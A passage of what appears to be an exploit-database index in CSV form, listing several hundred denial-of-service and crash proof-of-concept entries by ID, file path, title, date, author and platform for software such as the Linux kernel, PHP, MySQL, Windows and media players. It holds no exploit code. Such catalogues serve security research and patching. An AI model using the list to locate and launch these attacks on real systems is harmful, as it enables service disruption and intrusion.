Solaris - 'rdist' Privilege Escalation",2010-07-13,"Monarch Rich",dos,solaris, +34348,exploits/linux/dos/34348.txt,"OpenLDAP 2.4.22 - 'modrdn' Multiple Vulnerabilities",2010-07-19,"Ilkka Mattila",dos,linux, +34355,exploits/windows/dos/34355.txt,"Microsoft DirectX 8/9 DirectPlay - Multiple Denial of Service Vulnerabilities",2010-07-18,"Luigi Auriemma",dos,windows, +34356,exploits/linux/dos/34356.txt,"gif2png 2.5.2 - Remote Buffer Overflow",2009-12-12,"Razuel Akaharnath",dos,linux, +34359,exploits/windows/dos/34359.html,"Microsoft Outlook Web Access for Exchange Server 2003 - Cross-Site Request Forgery",2010-07-20,anonymous,dos,windows, +34360,exploits/multiple/dos/34360.txt,"Monolith Lithtech Game Engine - Memory Corruption",2010-07-21,"Luigi Auriemma",dos,multiple, +34364,exploits/linux/dos/34364.html,"Qt 4.6.3 - 'QTextEngine::LayoutData::reallocate()' Memory Corruption",2010-07-13,D4rk357,dos,linux, +34368,exploits/windows/dos/34368.c,"Mthree Development MP3 to WAV Decoder - '.mp3' Remote Buffer Overflow",2009-10-31,4m!n,dos,windows, +34375,exploits/linux/dos/34375.txt,"sSMTP 2.62 - 'standardize()' Buffer Overflow",2010-07-26,"Brendan Boerner",dos,linux, +34394,exploits/hardware/dos/34394.pl,"D-Link WBR-2310 1.0.4 - GET Remote Buffer Overflow",2010-08-03,"Rodrigo Escobar",dos,hardware, +34395,exploits/windows/dos/34395.pl,"PMSoftware Simple Web Server 2.1 - 'From:' Header Processing Remote Denial of Service",2010-08-03,"Rodrigo Escobar",dos,windows, +34403,exploits/windows/dos/34403.pl,"Quick 'n Easy FTP Server 3.9.1 - USER Command Remote Buffer Overflow",2010-07-22,demonalex,dos,windows, +34404,exploits/windows/dos/34404.pl,"K-Meleon 1.x - URI Handling Multiple Denial of Service Vulnerabilities",2010-08-04,Lostmon,dos,windows, +34427,exploits/linux/dos/34427.txt,"OpenSSL - 'ssl3_get_key_exchange()' Use-After-Free Memory Corruption",2010-08-07,"Georgi Guninski",dos,linux, +34428,exploits/windows/dos/34428.py,"Quintessential Media Player 5.0.121 - '.m3u' Buffer Overflow",2010-08-09,"Abhishek Lyall",dos,windows, +34442,exploits/windows/dos/34442.html,"Kylinsoft InstantGet 2.08 - ActiveX Control 'ShowBar' Method Buffer Overflow",2009-09-19,the_Edit0r,dos,windows, +34457,exploits/multiple/dos/34457.txt,"Sniper Elite 1.0 - Null Pointer Dereference Denial of Service",2009-08-14,"Luigi Auriemma",dos,multiple, +34458,exploits/windows/dos/34458.html,"Microsoft Internet Explorer - Memory Corruption (PoC) (MS14-029)",2014-08-28,PhysicalDrive0,dos,windows, +34460,exploits/windows/dos/34460.py,"Sonique 2.0 - '.xpl' Remote Stack Based Buffer Overflow",2010-08-12,"Hamza_hack_dz & Black-liondz1",dos,windows, +34463,exploits/windows/dos/34463.py,"HTML Help Workshop 1.4 - Buffer Overflow (SEH)",2014-08-29,"Moroccan Kingdom (MKD)",dos,windows, +34480,exploits/windows/dos/34480.py,"Xilisoft Video Converter 3.1.8.0720b - '.ogg' Buffer Overflow",2010-08-16,"Praveen Darshanam",dos,windows, +34502,exploits/windows/dos/34502.py,"Serveez 0.1.7 - 'If-Modified-Since' Header Stack Buffer Overflow",2009-08-09,"lvac lvac",dos,windows, +34505,exploits/php/dos/34505.txt,"MySQL 5.1.48 - 'Temporary InnoDB' Tables Denial of Service",2010-08-19,"Boris Reisig",dos,php, +34506,exploits/linux/dos/34506.txt,"MySQL 5.1.48 - 'EXPLAIN' Denial of Service",2010-08-20,"Bjorn Munch",dos,linux, +34510,exploits/linux/dos/34510.txt,"OraclMySQL 5.1.48 - 'LOAD DATA INFILE' Denial of Service",2010-08-20,"Elena Stepanova",dos,linux, +35592,exploits/windows/dos/35592.py,"jetAudio 8.1.3 Basic (mp3) - Crash (PoC)",2014-12-23,"Drozdova Liudmila",dos,windows, +34520,exploits/linux/dos/34520.txt,"Oracle MySQL 5.1.48 - 'HANDLER' Interface Denial of Service",2010-08-20,"Matthias Leich",dos,linux, +34521,exploits/linux/dos/34521.txt,"Oracle MySQL < 5.1.49 - Malformed 'BINLOG' Arguments Denial of Service",2010-08-20,"Shane Bester",dos,linux, +34522,exploits/linux/dos/34522.txt,"Oracle MySQL < 5.1.49 - 'DDL' Statements Denial of Service",2010-07-09,"Elena Stepanova",dos,linux, +34530,exploits/windows/dos/34530.py,"Crystal Player 1.98 - '.mls' Buffer Overflow",2010-08-20,"Praveen Darshanam",dos,windows, +34540,exploits/windows/dos/34540.py,"BulletProof FTP Client 2010 - Buffer Overflow (SEH) (Python)",2014-09-05,"Robert Kugler",dos,windows, +34588,exploits/aix/dos/34588.txt,"PHP Stock Management System 1.02 - Multiple Vulnerabilities",2014-09-09,jsass,dos,aix, +34603,exploits/windows/dos/34603.py,"Adobe Acrobat and Reader 9.3.4 - 'acroform_PlugInMain' Memory Corruption",2010-09-06,ITSecTeam,dos,windows, +34602,exploits/windows/dos/34602.html,"Microsoft Internet Explorer 7/8 - CSS Handling Cross Domain Information Disclosure",2010-09-06,"Chris Evans",dos,windows, +34698,exploits/windows/dos/34698.txt,"Microsoft Excel 2002 - Memory Corruption",2010-09-23,Abysssec,dos,windows, +34720,exploits/windows/dos/34720.pl,"Fast Image Resizer 098 - Local Crash (PoC)",2014-09-20,"niko sec",dos,windows, +34729,exploits/windows/dos/34729.py,"Seafile-server 3.1.5 - Remote Denial of Service",2014-09-20,"nop nop",dos,windows, +34752,exploits/windows/dos/34752.c,"WS10 Data Server - SCADA Overflow (PoC)",2014-09-24,"Pedro Sánchez",dos,windows, +34767,exploits/windows/dos/34767.py,"BS.Player 2.56 - '.m3u' / '.pls' File Processing Multiple Remote Denial of Service Vulnerabilities",2010-09-26,modpr0be,dos,windows, +34855,exploits/windows/dos/34855.pl,"ALPHA Player 2.4 - '.bmp' Buffer Overflow",2010-10-19,anT!-Tr0J4n,dos,windows, +34857,exploits/windows/dos/34857.txt,"TeamSpeak Client 3.0.14 - Buffer Overflow",2014-10-02,"SpyEye & Christian Galeon",dos,windows, +34872,exploits/windows/dos/34872.py,"MASS PLAYER 2.1 - File Processing Remote Denial of Service",2010-10-19,Sweet,dos,windows, +34889,exploits/windows/dos/34889.vcf,"Microsoft Windows Mobile - Overly Long vCard Name Field Denial of Service",2010-10-21,SecurityArchitect.Org,dos,windows, +34938,exploits/windows/dos/34938.txt,"TeamSpeak 2.0.32.60 - Memory Corruption",2010-10-28,"Jokaim & nSense",dos,windows, +34953,exploits/linux/dos/34953.txt,"FUSE fusermount Tool - Race Condition",2010-11-02,halfdog,dos,linux, +34980,exploits/novell/dos/34980.py,"Novell Groupwise 8.0 - Multiple Remote Vulnerabilities",2010-11-08,"Francis Provencher",dos,novell, +35013,exploits/linux/dos/35013.c,"Linux Kernel 2.6.x - 'inotify_init()' Memory Leak Local Denial of Service",2010-11-24,"Vegard Nossum",dos,linux, +35000,exploits/windows/dos/35000.txt,"SAP NetWeaver Enqueue Server - Denial of Service",2014-10-17,"Core Security",dos,windows,3200 +35058,exploits/bsd/dos/35058.c,"OpenBSD 5.5 - Local Kernel Panic (Denial of Service)",2014-10-25,nitr0us,dos,bsd, +40099,exploits/multiple/dos/40099.txt,"Adobe Acrobat Reader DC 15.016.20045 - Invalid Font '.ttf' Memory Corruption (5)",2016-07-13,COSIG,dos,multiple, +40100,exploits/multiple/dos/40100.txt,"Adobe Acrobat Reader DC 15.016.20045 - Invalid Font '.ttf' Memory Corruption (6)",2016-07-13,COSIG,dos,multiple, +40101,exploits/multiple/dos/40101.txt,"Adobe Acrobat Reader DC 15.016.20045 - Invalid Font '.ttf' Memory Corruption (7)",2016-07-13,COSIG,dos,multiple, +40102,exploits/multiple/dos/40102.txt,"Adobe Flash Player 22.0.0.192 - DefineBitsJPEG2 Memory Corruption",2016-07-13,COSIG,dos,multiple, +40103,exploits/multiple/dos/40103.txt,"Adobe Flash Player 22.0.0.192 - DefineSprite Memory Corruption",2016-07-13,COSIG,dos,multiple, +35061,exploits/linux/dos/35061.c,"GNU glibc - 'regcomp()' Stack Exhaustion Denial of Service",2010-12-07,"Maksymilian Arciemowicz",dos,linux, +35081,exploits/linux/dos/35081.txt,"Binary File Descriptor Library (libbfd) - Out-of-Bounds Crash",2014-10-27,"Michal Zalewski",dos,linux, +35086,exploits/multiple/dos/35086.rb,"Allegro RomPager 4.07 - UPnP HTTP Request Remote Denial of Service",2010-12-08,"Ricky-Lee Birtles",dos,multiple, +35105,exploits/windows/dos/35105.pl,"Mini-stream RM-MP3 Converter 3.1.2.1.2010.03.30 - '.wax' File Buffer Overflow / Denial of Service EIP Overwrite",2014-10-29,"ZoRLu Bugrahan",dos,windows, +35153,exploits/osx/dos/35153.c,"Apple Mac OSX (Mavericks) - 'IOBluetoothHCIUserClient' Privilege Escalation",2014-11-03,"rpaleari & joystick",dos,osx, +35154,exploits/asp/dos/35154.txt,"Sigma Portal - 'ShowObjectPicture.aspx' Denial of Service",2010-12-27,"Pouya Daneshmand",dos,asp, +35158,exploits/windows/dos/35158.py,"Mongoose 2.11 - 'Content-Length' HTTP Header Remote Denial of Service",2010-12-27,JohnLeitch,dos,windows, +35162,exploits/linux/dos/35162.cob,"GIMP 2.6.7 - Multiple File Plugins Remote Stack Buffer Overflow Vulnerabilities",2010-12-31,"non customers",dos,linux, +35163,exploits/windows/dos/35163.c,"ImgBurn 2.4 - 'dwmapi.dll' DLL Loading Arbitrary Code Execution",2011-01-01,d3c0der,dos,windows, +35164,exploits/php/dos/35164.php,"PHP 5.3.2 - 'zend_strtod()' Floating-Point Value Denial of Service",2011-01-03,"Rick Regan",dos,php, +35173,exploits/linux/dos/35173.txt,"Minix 3.3.0 - Local Denial of Service (PoC)",2014-11-06,nitr0us,dos,linux, +35178,exploits/windows/dos/35178.py,"i.Hex 0.98 - Local Crash (PoC)",2014-11-06,metacom,dos,windows, +35179,exploits/windows/dos/35179.py,"i.Mage 1.11 - Local Crash (PoC)",2014-11-06,metacom,dos,windows, +35182,exploits/win_x86/dos/35182.txt,"VMware Workstations 10.0.0.40273 - 'vmx86.sys' Arbitrary Kernel Read",2014-11-06,KoreLogic,dos,win_x86, +35202,exploits/windows/dos/35202.py,"Microsoft Internet Explorer 11 - Denial of Service",2014-11-10,"Behrooz Abbassi",dos,windows, +35217,exploits/windows/dos/35217.txt,"CorelDRAW X7 CDR File - 'CdrTxt.dll' Off-by-One Stack Corruption",2014-11-12,LiquidWorm,dos,windows, +35240,exploits/linux/dos/35240.c,"acpid 1.0.x - Multiple Local Denial of Service Vulnerabilities",2011-01-19,"Vasiliy Kulikov",dos,linux, +35244,exploits/windows/dos/35244.py,"Golden FTP Server 4.70 - Malformed Message Denial of Service",2011-01-19,"Craig Freyman",dos,windows, +35279,exploits/osx/dos/35279.html,"Apple Mac OSX Safari 8.0 - Crash (PoC)",2014-11-17,w3bd3vil,dos,osx, +35302,exploits/linux/dos/35302.c,"Minix 3.3.0 - Remote TCP/IP Stack Denial of Service",2014-11-19,nitr0us,dos,linux,31337 +35304,exploits/multiple/dos/35304.txt,"Oracle Java - Floating-Point Value Denial of Service",2011-02-01,"Konstantin Preisser",dos,multiple, +35326,exploits/windows/dos/35326.cpp,"Microsoft Windows - 'win32k.sys' Denial of Service",2014-11-22,Kedamsky,dos,windows, +35339,exploits/multiple/dos/35339.txt,"JourneyMap 5.0.0RC2 Ultimate Edition - Resource Consumption (Denial of Service)",2014-11-24,CovertCodes,dos,multiple, +35342,exploits/aix/dos/35342.txt,"RobotStats 1.0 - HTML Injection",2014-11-24,"ZoRLu Bugrahan",dos,aix, +35345,exploits/hardware/dos/35345.txt,"TP-Link TL-WR740N - Denial of Service",2014-11-24,LiquidWorm,dos,hardware, +35354,exploits/php/dos/35354.txt,"PHP 5.3.5 - 'grapheme_extract()' Null Pointer Dereference Denial of Service",2011-02-17,"Maksymilian Arciemowicz",dos,php, +35358,exploits/php/dos/35358.txt,"PHP 5.5.12 - Locale::parseLocale Memory Corruption",2014-11-24,"John Leitch",dos,php, +35359,exploits/multiple/dos/35359.txt,"tcpdump 4.6.2 - Geonet Decoder Denial of Service",2014-11-24,"Steffen Bauch",dos,multiple, +35363,exploits/windows/dos/35363.txt,"TRENDnet SecurView Wireless Network Camera TV-IP422WN - 'UltraCamX.ocx' Stack Buffer Overflow",2014-11-25,LiquidWorm,dos,windows, +35369,exploits/multiple/dos/35369.txt,"Battlefield 2/2142 - Packet Null Pointer Dereference Remote Denial of Service",2011-02-22,"Luigi Auriemma",dos,multiple, +35379,exploits/windows/dos/35379.go,"Elipse E3 - HTTP Denial of Service",2014-11-26,firebitsbr,dos,windows,80 +35382,exploits/android/dos/35382.txt,"Android WAPPushManager - SQL Injection",2014-11-26,"Baidu X-Team",dos,android, +35403,exploits/linux/dos/35403.c,"Linux Kernel 2.6.x - epoll Nested Structures Local Denial of Service",2011-03-02,"Nelson Elhage",dos,linux, +35404,exploits/linux/dos/35404.c,"Linux Kernel 2.6.x - fs/eventpoll.c epoll Data Structure File Descriptor Local Denial of Service",2011-03-02,"Nelson Elhage",dos,linux, +35413,exploits/php/dos/35413.php,"WordPress 4.0 - Denial of Service",2014-12-01,SECURELI.com,dos,php,80 +35414,exploits/php/dos/35414.txt,"WordPress < 4.0.1 - Denial of Service",2014-12-01,"Javer Nieto & Andres Rojas",dos,php,80 +35415,exploits/php/dos/35415.txt,"Drupal < 7.34 - Denial of Service",2014-12-01,"Javer Nieto & Andres Rojas",dos,php,80 +35432,exploits/linux/dos/35432.txt,"Wireshark 1.4.3 - NTLMSSP Null Pointer Dereference Denial of Service",2011-03-01,"Buildbot Builder",dos,linux, +35437,exploits/multiple/dos/35437.pl,"Air Contacts Lite - HTTP Packet Denial of Service",2011-02-09,"Rodrigo Escobar",dos,multiple, +35445,exploits/linux/dos/35445.txt,"OpenLDAP 2.4.x - 'modrdn' NULL OldDN Remote Denial of Service",2011-01-03,"Serge Dubrouski",dos,linux, +35465,exploits/multiple/dos/35465.pl,"VideoLAN VLC Media Player 1.0.5 - '.ape' Denial of Service",2011-03-15,KedAns-Dz,dos,multiple, +35478,exploits/linux/dos/35478.txt,"MHonArc 2.6.16 - Tag Nesting Remote Denial of Service",2010-12-21,anonymous,dos,linux, +35483,exploits/php/dos/35483.txt,"PHP 5.3.x 'Intl' Extension - 'NumberFormatter::setSymbol()' Denial of Service",2011-03-10,thoger,dos,php, +35484,exploits/php/dos/35484.php,"PHP 5.3.x 'Zip' Extension - 'stream_get_contents()' Denial of Service",2011-03-10,paulgao,dos,php, +35485,exploits/php/dos/35485.php,"PHP < 5.3.6 'Zip' Extension - 'zip_fread()' Denial of Service",2011-03-10,TorokAlpar,dos,php, +35486,exploits/php/dos/35486.php,"PHP < 5.3.6 'OpenSSL' Extension - 'openssl_encrypt' Plaintext Data Memory Leak Denial of Service",2011-03-08,dovbysh,dos,php, +35487,exploits/php/dos/35487.php,"PHP < 5.3.6 'OpenSSL' Extension - 'openssl_decrypt' Ciphertext Data Memory Leak Denial of Service",2011-03-08,dovbysh,dos,php, +35489,exploits/multiple/dos/35489.pl,"Perl 5.x - 'Perl_reg_numbered_buff_fetch()' Remote Denial of Service",2011-03-23,"Vladimir Perepelitsa",dos,multiple, +35502,exploits/windows/dos/35502.pl,"eXPert PDF Batch Creator 7.0.880.0 - Denial of Service",2011-03-27,KedAns-Dz,dos,windows, +35507,exploits/windows/dos/35507.pl,"DivX Player 7 - Multiple Remote Buffer Overflow Vulnerabilities",2011-03-27,KedAns-Dz,dos,windows, +35530,exploits/windows/dos/35530.py,"Mediacoder 0.8.33 build 5680 - '.m3u' Buffer Overflow (SEH) (Denial of Service)",2014-12-15,s-dz,dos,windows, +35531,exploits/windows/dos/35531.py,"Mediacoder 0.8.33 build 5680 - '.lst' Buffer Overflow (SEH) (Denial of Service)",2014-12-15,s-dz,dos,windows, +35532,exploits/windows/dos/35532.py,"jaangle 0.98i.977 - Denial of Service",2014-12-15,s-dz,dos,windows, +35539,exploits/php/dos/35539.txt,"phpMyAdmin 4.0.x/4.1.x/4.2.x - Denial of Service",2014-12-15,"Javer Nieto & Andres Rojas",dos,php, +35552,exploits/windows/dos/35552.py,"MoviePlay 4.82 - '.avi' Buffer Overflow",2011-03-31,^Xecuti0N3r,dos,windows, +35553,exploits/windows/dos/35553.pl,"Microsoft Windows Media Player 11.0.5721.5145 - '.avi' Buffer Overflow",2011-03-31,^Xecuti0N3r,dos,windows, +35580,exploits/linux/dos/35580.rb,"Ettercap 0.8.0 < 0.8.1 - Multiple Denial of Service Vulnerabilities",2014-12-19,"Nick Sampanis",dos,linux, +35589,exploits/windows/dos/35589.py,"Notepad++ 6.6.9 - Buffer Overflow",2014-12-22,TaurusOmar,dos,windows, +35600,exploits/linux/dos/35600.c,"Linux Kernel 2.6.x - 'inotify_init1()' Double-Free Local Denial of Service",2011-04-11,anonymous,dos,linux, +35613,exploits/multiple/dos/35613.py,"TOTVS ERP Microsiga Protheus 8/10 - Memory Corruption (Denial of Service)",2011-04-13,waKKu,dos,multiple, +35622,exploits/windows/dos/35622.txt,"Wickr Desktop 2.2.1 Windows - Denial of Service",2014-12-27,Vulnerability-Lab,dos,windows, +35637,exploits/android/dos/35637.py,"WhatsApp 2.11.476 (Android) - Remote Reboot/Crash App (Denial of Service)",2014-12-28,"Daniel Godoy",dos,android, +35656,exploits/windows/dos/35656.pl,"eXPert PDF 7.0.880.0 - '.pj' Heap Based Buffer Overflow",2011-04-25,KedAns-Dz,dos,windows, +35654,exploits/windows/dos/35654.py,"AT-TFTP Server 1.8 - 'Read' Request Remote Denial of Service",2011-04-25,"Antu Sanadi",dos,windows, +35725,exploits/multiple/dos/35725.pl,"Perl 5.10 - Multiple Null Pointer Dereference Denial of Service Vulnerabilities",2011-05-03,"Jonathan Brossard",dos,multiple, +35738,exploits/linux/dos/35738.php,"Apache 1.4/2.2.x - APR 'apr_fnmatch()' Denial of Service",2011-05-12,"Maksymilian Arciemowicz",dos,linux, +35753,exploits/multiple/dos/35753.pl,"Novell eDirectory 8.8 and Netware LDAP-SSL Daemon - Denial of Service",2011-05-16,Knud,dos,multiple, +35771,exploits/osx/dos/35771.c,"Apple Mac OSX 10.10 - BlueTooth DispatchHCICreateConnection Crash (PoC)",2015-01-13,"rpaleari & joystick",dos,osx, +35772,exploits/osx/dos/35772.c,"Apple Mac OSX 10.10 - BlueTooth BlueToothHCIChangeLocalName Crash (PoC)",2015-01-13,"rpaleari & joystick",dos,osx, +35773,exploits/osx/dos/35773.c,"Apple Mac OSX 10.10 - BlueTooth TransferACLPacketToHW Crash (PoC)",2015-01-13,"rpaleari & joystick",dos,osx, +35774,exploits/osx/dos/35774.c,"Apple Mac OSX 10.10 - BlueTooth DispatchHCIWriteStoredLinkKey Crash (PoC)",2015-01-13,"rpaleari & joystick",dos,osx, +35804,exploits/windows/dos/35804.txt,"NetVault: SmartDisk 1.2 - 'libnvbasics.dll' Remote Denial of Service",2011-05-28,"Luigi Auriemma",dos,windows, +35820,exploits/linux/dos/35820.c,"Linux Kernel 2.6.x - KSM Local Denial of Service",2011-06-02,"Andrea Righi",dos,linux, +35827,exploits/windows/dos/35827.py,"JetAudio 8.1.3 - '.mp4' Crash (PoC)",2014-12-12,"Drozdova Liudmila",dos,windows, +35828,exploits/windows/dos/35828.py,"Winamp 5.666 build 3516 - Corrupted .flv Crash (PoC)",2014-12-12,"Drozdova Liudmila",dos,windows, +35842,exploits/windows/dos/35842.c,"Malwarebytes Anti-Exploit 1.03.1.1220/1.04.1.1012 - Out-of-Bounds Read Denial of Service",2015-01-20,"Parvez Anwar",dos,windows, +35849,exploits/osx/dos/35849.c,"Apple Mac OSX 10.10 - IOKit IntelAccelerator Null Pointer Dereference",2015-01-20,"Google Security Research",dos,osx, +35856,exploits/multiple/dos/35856.html,"Opera Web Browser 11.11 - Denial of Service",2011-06-14,echo,dos,multiple, +35859,exploits/hardware/dos/35859.py,"Zhone GPON 2520 R4.0.2.566b - Crash (PoC)",2015-01-21,"Kaczinski Ramirez",dos,hardware, +35869,exploits/windows/dos/35869.txt,"Crystal Player 1.99 - Memory Corruption",2015-01-21,"Kapil Soni",dos,windows, +35870,exploits/windows/dos/35870.rb,"Exif Pilot 4.7.2 - Buffer Overflow (SEH)",2015-01-22,"Osanda Malith",dos,windows, +35873,exploits/windows/dos/35873.txt,"Wireshark 1.4.5 - 'bytes_repr_len()' Null Pointer Dereference Denial of Service",2011-06-17,rouli,dos,windows, +35876,exploits/windows/dos/35876.html,"Easewe FTP OCX ActiveX Control 4.5.0.9 - 'EaseWeFtp.ocx' Multiple Insecure Method Vulnerabilities",2011-06-22,"High-Tech Bridge SA",dos,windows, +35889,exploits/windows/dos/35889.py,"IceCream Ebook Reader 1.41 - Crash (PoC)",2015-01-23,"Kapil Soni",dos,windows, +35895,exploits/windows/dos/35895.txt,"RealityServer Web Services RTMP Server 3.1.1 build 144525.5 - Null Pointer Dereference Denial of Service",2011-06-28,"Luigi Auriemma",dos,windows, +35913,exploits/android/dos/35913.txt,"Android WiFi-Direct - Denial of Service",2015-01-26,"Core Security",dos,android, +35935,exploits/windows/dos/35935.py,"UniPDF 1.1 - Crash (PoC) (SEH)",2015-01-29,bonze,dos,windows, +35938,exploits/freebsd/dos/35938.txt,"FreeBSD - Multiple Vulnerabilities",2015-01-29,"Core Security",dos,freebsd, +35939,exploits/hardware/dos/35939.txt,"Alice Modem 1111 - 'rulename' Cross-Site Scripting / Denial of Service",2011-07-12,"Moritz Naumann",dos,hardware, +35951,exploits/linux/dos/35951.py,"Exim ESMTP 4.80 - glibc gethostbyname Denial of Service",2015-01-29,1n3,dos,linux, +35957,exploits/linux/dos/35957.txt,"Linux Kernel 2.6.26 - Auerswald USB Device Driver Buffer Overflow (PoC)",2009-10-19,"R. Dominguez Veg",dos,linux, +36007,exploits/multiple/dos/36007.txt,"AzeoTech DaqFactory - Denial of Service",2011-06-24,"Knud Erik Hojgaard",dos,multiple, +36022,exploits/windows/dos/36022.py,"MooPlayer 1.3.0 - 'm3u' Buffer Overflow (SEH) (PoC)",2015-02-09,"Samandeep Singh",dos,windows, +36024,exploits/linux/dos/36024.txt,"Chemtool 1.6.14 - Memory Corruption",2015-02-08,"Pablo González",dos,linux, +36037,exploits/multiple/dos/36037.txt,"Adobe Flash Media Server 4.0.2 - Null Pointer Dereference Remote Denial of Service",2011-08-09,"Knud Erik Hojgaard",dos,multiple, +36070,exploits/php/dos/36070.txt,"PHP < 5.3.7 - Multiple Null Pointer Dereference Denial of Service Vulnerabilities",2011-08-19,"Maksymilian Arciemowicz",dos,php, +36071,exploits/windows/dos/36071.py,"Xlight FTP Server 3.7 - Remote Buffer Overflow",2011-08-19,KedAns-Dz,dos,windows, +36092,exploits/windows/dos/36092.pl,"MapServer 6.0 - '.Map' File Double-Free Remote Denial of Service",2011-08-30,rouault,dos,windows, +36128,exploits/windows/dos/36128.txt,"Wireshark 1.6.1 - Malformed Packet Trace File Remote Denial of Service",2011-09-08,Wireshark,dos,windows, +36152,exploits/windows/dos/36152.html,"Samsung iPOLiS 1.12.2 - iPOLiS XnsSdkDeviceIpInstaller ActiveX WriteConfigValue (PoC)",2015-02-22,"Praveen Darshanam",dos,windows, +36158,exploits/php/dos/36158.txt,"PHP DateTime - Use-After-Free",2015-02-23,"Taoguang Chen",dos,php, +36190,exploits/linux/dos/36190.txt,"SQLite3 3.8.6 - Controlled Memory Corruption (PoC)",2015-02-26,"Andras Kabai",dos,linux, +36198,exploits/multiple/dos/36198.pl,"Polipo 1.0.4.1 - POST/PUT HTTP Header Processing Denial of Service",2011-10-01,"Usman Saeed",dos,multiple, +36211,exploits/windows/dos/36211.txt,"Microsoft Host Integration Server 2004-2010 - Remote Denial of Service",2011-04-11,"Luigi Auriemma",dos,windows, +36234,exploits/multiple/dos/36234.txt,"G-WAN 2.10.6 - Buffer Overflow / Denial of Service",2011-10-13,"Fredrik Widlund",dos,multiple, +36247,exploits/multiple/dos/36247.txt,"Splunk 4.1.6 Web Component - Remote Denial of Service",2011-10-20,"Filip Palian",dos,multiple, +36260,exploits/windows/dos/36260.txt,"Opera Web Browser 11.52 - Escape Sequence Stack Buffer Overflow Denial of Service",2011-10-28,"Marcel Bernhardt",dos,windows, +36266,exploits/lin_x86-64/dos/36266.c,"Linux Kernel 3.17.5 - IRET Instruction #SS Fault Handling Crash (PoC)",2015-03-04,"Emeric Nasi",dos,lin_x86-64, +36267,exploits/linux/dos/36267.c,"Linux Kernel 3.15.6 - PPP-over-L2TP Socket Level Handling Crash (PoC)",2015-03-04,"Emeric Nasi",dos,linux, +36268,exploits/linux/dos/36268.c,"Linux Kernel 3.16.3 - Associative Array Garbage Collection Crash (PoC)",2015-03-04,"Emeric Nasi",dos,linux, +36271,exploits/osx/dos/36271.py,"Apple Mac OSX 10.6.5 / iOS 4.3.3 Mail - Denial of Service",2011-10-29,shebang42,dos,osx, +36285,exploits/windows/dos/36285.c,"Microsoft Windows - TCP/IP Stack Reference Counter Integer Overflow (MS11-083)",2011-11-08,anonymous,dos,windows, +36288,exploits/multiple/dos/36288.php,"Libc - 'regcomp()' Stack Exhaustion Denial of Service",2011-11-04,"Maksymilian Arciemowicz",dos,multiple, +36300,exploits/windows/dos/36300.py,"Kool Media Converter 2.6.0 - '.ogg' File Buffer Overflow",2011-11-11,swami,dos,windows, +36309,exploits/hardware/dos/36309.py,"Sagem F@st 3304-V2 - Telnet Crash (PoC)",2015-03-08,"Loudiyi Mohamed",dos,hardware, +36334,exploits/windows/dos/36334.txt,"Foxit Products GIF Conversion - 'LZWMinimumCodeSize' Memory Corruption",2015-03-11,"Francis Provencher",dos,windows, +36335,exploits/windows/dos/36335.txt,"Foxit Products GIF Conversion - 'DataSubBlock' Memory Corruption",2015-03-11,"Francis Provencher",dos,windows, +36336,exploits/windows/dos/36336.txt,"Microsoft Windows - Text Services Memory Corruption (MS15-020)",2015-03-11,"Francis Provencher",dos,windows, +36361,exploits/windows/dos/36361.py,"Titan FTP Server 8.40 - 'APPE' Remote Denial of Service",2011-11-25,"Houssam Sahli",dos,windows, +36377,exploits/multiple/dos/36377.txt,"CoDeSys 3.4 - POST Null Pointer Content-Length Parsing Remote Denial of Service",2011-11-30,"Luigi Auriemma",dos,multiple, +36378,exploits/multiple/dos/36378.txt,"CoDeSys 3.4 - Null Pointer Invalid HTTP Request Parsing Remote Denial of Service",2011-11-30,"Luigi Auriemma",dos,multiple, +36405,exploits/windows/dos/36405.txt,"Serv-U FTP Server 11.1.0.3 - Denial of Service / Security Bypass",2011-12-05,"Luigi Auriemma",dos,windows, +36388,exploits/linux/dos/36388.py,"Brasero CD/DVD Burner 3.4.1 - '.m3u' Buffer Overflow Crash (PoC)",2015-03-16,"Avinash Thapa",dos,linux, +36392,exploits/windows/dos/36392.txt,"Intel Network Adapter Diagnostic Driver - IOCTL Handling",2015-03-14,"Glafkos Charalambous",dos,windows, +36403,exploits/windows/dos/36403.html,"HP Device Access Manager for HP ProtectTools 5.0/6.0 - Heap Memory Corruption",2011-12-02,"High-Tech Bridge SA",dos,windows, +36404,exploits/linux/dos/36404.c,"GNU glibc - Timezone Parsing Remote Integer Overflow",2009-06-01,dividead,dos,linux, +36783,exploits/windows/dos/36783.txt,"Oracle Hyperion Smart View for Office 11.1.2.3.000 - Crash (PoC)",2015-04-17,sajith,dos,windows, +36422,exploits/windows/dos/36422.txt,"Fortinet Single Sign On - Stack Overflow",2015-03-18,"Core Security",dos,windows,8000 +36425,exploits/linux/dos/36425.txt,"Linux Kernel 2.6.35 - Network Namespace Remote Denial of Service",2011-12-06,"Serge Hallyn",dos,linux, +36427,exploits/windows/dos/36427.txt,"PowerDVD 11.0.0.2114 - Remote Denial of Service",2011-12-07,"Luigi Auriemma",dos,windows, +36431,exploits/windows/dos/36431.pl,"FastStone Image Viewer 5.3 - '.tga' Crash (PoC)",2015-03-19,"ITDefensor Vulnerability Research Team",dos,windows, +36433,exploits/windows/dos/36433.txt,"Yahoo! CD Player - ActiveX Control 'open()' Method Stack Buffer Overflow",2011-04-20,shinnai,dos,windows, +36443,exploits/windows/dos/36443.txt,"Opera Web Browser < 11.60 - Denial of Service / Multiple Vulnerabilities",2011-12-12,anonymous,dos,windows, +40453,exploits/multiple/dos/40453.py,"ISC BIND 9 - Denial of Service",2016-10-04,Infobyte,dos,multiple,53 +36545,exploits/linux/dos/36545.txt,"Linux Kernel 3.1.8 - KVM Local Denial of Service",2011-12-29,"Stephan Sattler",dos,linux, +36570,exploits/multiple/dos/36570.txt,"Rockwell Automation FactoryTalk Activation Server - Multiple Denial of Service Vulnerabilities",2012-01-17,"Luigi Auriemma",dos,multiple, +36622,exploits/windows/dos/36622.pl,"UltraPlayer 2.112 - '.avi' File Denial of Service",2012-01-24,KedAns-Dz,dos,windows, +36633,exploits/linux/dos/36633.txt,"Wireshark - Buffer Underflow / Denial of Service",2012-01-10,"Laurent Butti",dos,linux, +36662,exploits/windows/dos/36662.txt,"Edraw Diagram Component 5 - ActiveX Control 'LicenseName()' Method Buffer Overflow",2012-02-06,"Senator of Pirates",dos,windows, +36669,exploits/linux/dos/36669.txt,"Apache APR - Hash Collision Denial of Service",2012-01-05,"Moritz Muehlenhoff",dos,linux, +36682,exploits/php/dos/36682.php,"PHP PDORow Object - Remote Denial of Service",2011-09-24,anonymous,dos,php, +36741,exploits/lin_x86/dos/36741.py,"Samba < 3.6.2 (x86) - Denial of Service (PoC)",2015-04-13,sleepya,dos,lin_x86, +36743,exploits/linux/dos/36743.c,"Linux Kernel 3.13/3.14 (Ubuntu) - 'splice()' System Call Local Denial of Service",2015-04-13,"Emeric 